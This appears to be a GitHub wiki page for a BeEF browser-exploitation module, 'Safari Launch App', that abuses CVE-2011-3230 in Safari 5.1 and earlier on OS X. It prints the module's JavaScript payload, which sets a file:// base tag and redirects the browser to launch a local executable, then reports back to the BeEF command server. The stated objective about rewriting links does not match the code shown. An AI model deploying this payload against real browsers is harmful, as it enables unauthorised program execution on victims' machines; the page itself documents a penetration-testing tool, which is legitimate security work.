-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Safari Launch App
Jess Williams edited this page Jan 13, 2020
·
3 revisions
-
Objective: rewrite a selected real URL link to a fake url
-
Authors: antisnatchor
-
Browsers: Safari <= 5.1 on OSX
Uses the file://
scheme to launch an executable.
baseTag.setAttribute('href', 'file://');
document.head.appendChild(baseTag);
setTimeout('document.location="<%= @app_path %>";beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command [<%= @app_path %>] launched");', 1000);
See CVE-2011-3230 for more details.
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK